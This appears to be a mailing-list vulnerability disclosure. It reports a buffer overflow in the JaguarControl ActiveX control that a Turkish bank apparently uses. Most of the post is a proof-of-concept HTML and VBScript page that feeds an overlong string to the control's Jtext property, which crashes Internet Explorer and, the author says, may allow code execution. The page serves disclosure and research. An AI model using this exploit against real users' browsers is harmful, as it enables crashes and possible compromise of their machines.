<<< Date Index >>>     <<< Thread Index >>>

JaguarControl Activex Buffer Overflow



Vendor: http://www.isemarket.com
Bug: JaguarControl can crash Internet Explorer
Found: Tacettin Karadeniz
E-Mail: tacettinkaradeniz _at_ yahoo.com
Vendor Status: Reported

The exploit can cause Internet Explorer to crash
and(or) the execution of arbitrary code on the user's
computer.

<object
classid="CLSID:0FC8B38E-9293-424C-9D0E-CE60775679CF"
id="JagEditParola"></object> 
<script language="vbscript">
<!-- 
msgbox("XXXXXXX BANKASI GUVENLIK KALKANI
v1.1.0.18"+Chr(10)+"(JaguarControl
NT/2K/XP)"+Chr(10)+"Buffer CRACKED {Tested XP SP1}" +
Chr(10) + "Bug Found: Tacettin Karadeniz [
tacettinkaradeniz[@]yahoo.com ]") 
a="1234567890qwertyuopasdfghjklzxcvbnm"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparapara0000paraparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
JagEditParola.Jtext=a
--></script>


                
____________________________________________________
Start your day with Yahoo! - make it your home page 
http://www.yahoo.com/r/hs